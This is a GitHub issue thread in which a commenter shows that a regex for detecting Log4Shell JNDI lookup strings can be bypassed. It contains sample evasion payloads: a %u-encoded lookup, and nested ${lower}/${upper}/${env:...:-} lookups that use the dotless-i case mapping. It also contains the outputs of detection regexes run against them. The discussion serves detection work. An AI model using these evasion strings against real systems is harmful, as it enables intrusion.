New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Regex can be bypassed. #3
Comments
Hi THX for the issue. I used it, among others, to incorporate a few optimizations into my RegEx. Following some comments on your suggestions:
The
Already the old RegEx allowed for escaping of safe charactersin general, though it didn't handle double encoding of safe characters right.Upcomming version will.
It's not my intend to "lull" someone into something. I'll put an comment into the readme, so everyone can understand. |
You’re right, in my haste I missed a conditional which I’ve fixed in the original message. It now shows both your regex and my collection as catching the first. One thing to be mindful of here though is that you’re headed down the path of handling all sorts of various encodings within the one regex. For example there was—for at least a brief while—a non-standard but not uncommon percent escaping for unicode: >>> esc_pu = lambda s: "".join("%%%s" % hex(ord(c))[2:] if ord(c) < 256 else "%%u%s" % hex(ord(c))[2:].rjust(4, "0") for c in s)
>>> s3 = esc_pu('${jnd${upper:ı}:ldap://')
>>> s3
'%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%3a%6c%64%61%70%3a%2f%2f'
>>> BACK2ROOT_RE.search(s3) or False
False
>>> pprint(test(s3))
{'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 48), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d'>,
'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 72), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%>,
'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 72), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%>} If the goal is to be resistant to unwrapping attacks against a diverse range of stacks then you may as well want to make sure alterations like this don’t also result in false negatives. I’m unsure of where you could expect to see this encoding nowadays, though. Interestingly though neither my
Neat! It is frankly difficult to tell what the regex can and can’t catch due to its complexity.
I do not think it is your intent, but I think it is a possible outcome. One of the hardest parts about being on a blue team is that by definition you get popped when you missed something, and so it is crucial to have 100% understanding of what it is you can and cannot catch. Grabbing a “comprehensive” regex like this where it is unlikely that that use will come with an understanding of its assumptions and limitations can turn out dangerously. Encoding assumptions into your detections will always open up surreptitious paths in violating those assumptions. As another example: >>> s4 = '${env:ZILCH:-jnd${lower:${upper:ı}}://addr'
>>> BACK2ROOT_RE.search(s4) or False
False
>>> pprint(test(s4))
{'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
'ANY_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
'ANY_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
'NESTED_INCL_ESCS_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
'NESTED_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
'NESTED_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>} I can’t easily tell you why your regex isn’t catching this one due to its overall complexity (my best guess is that it doesn’t handle defaults and/or some forms of potential nested evaluation), and I’m actually surprised it doesn’t as I’d assume that it would. This is that danger that I’m speaking of: if I were running your detection and relying on it I would likely assume that this would be caught and thus never notice that it wasn’t. |
Compare against https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6
The
?:%(25)*24|%)
idea is neat, and I even incorporated it briefly (along with(?:%(25)*5c|\\)
) but it assumes you’ll only ever escape url unsafe characters, and a smart attacker of course is going to violate that assumption. It is better not to lull your defender into a false sense of security, and this is why I havetest_thorough
.As well this regex does not detect unicode case mapping attacks, but the gist I’ve shared with you before does by avoiding the assumptions that result in the possible evasion entirely.
The text was updated successfully, but these errors were encountered: